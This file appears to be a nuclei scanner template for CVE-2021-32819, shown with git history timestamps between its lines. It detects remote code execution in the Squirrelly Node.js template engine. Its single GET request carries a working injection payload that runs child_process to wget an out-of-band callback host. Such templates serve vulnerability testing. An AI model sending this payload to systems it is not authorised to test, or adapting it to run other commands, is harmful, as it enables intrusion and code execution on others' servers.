nuclei-templates/http/cves/2021/CVE-2021-32819.yaml

47 lines
2.0 KiB
YAML
Raw Normal View History

2021-08-20 13:19:00 +00:00
id: CVE-2021-32819
info:
name: Nodejs Squirrelly - Remote Code Execution
2021-08-20 13:19:00 +00:00
author: pikpikcu
severity: high
2021-08-20 13:19:00 +00:00
description: |
Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
2023-09-06 12:09:01 +00:00
remediation: |
Update to the latest version of Nodejs Squirrelly template engine to mitigate the vulnerability.
2021-08-20 19:42:52 +00:00
reference:
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
2021-08-20 13:19:00 +00:00
- https://www.linuxlz.com/aqld/2331.html
2021-08-20 19:42:52 +00:00
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
- https://nvd.nist.gov/vuln/detail/CVE-2021-32819
2023-07-11 19:49:27 +00:00
- https://github.com/squirrellyjs/squirrelly/commit/c12418a026f73df645ba927fd29358efe02fed1e
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-32819
2023-07-11 19:49:27 +00:00
cwe-id: CWE-200,NVD-CWE-noinfo
2023-08-31 11:46:18 +00:00
epss-score: 0.886
2023-10-14 11:27:55 +00:00
epss-percentile: 0.98336
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: squirrelly
product: squirrelly
tags: cve,cve2021,nodejs,rce,oast
2021-08-20 13:19:00 +00:00
http:
2021-08-20 13:19:00 +00:00
- method: GET
path:
2021-08-20 19:42:52 +00:00
- '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'
2021-08-20 13:19:00 +00:00
2023-09-10 13:44:34 +00:00
matchers-condition: and
2021-08-20 19:42:52 +00:00
matchers:
2021-08-20 13:19:00 +00:00
- type: word
2021-08-20 19:42:52 +00:00
part: interactsh_protocol # Confirms the HTTP Interaction
2021-08-20 13:19:00 +00:00
words:
- "http"
2023-09-02 21:59:37 +00:00
- type: word
part: interactsh_request
words:
- "User-Agent: Wget"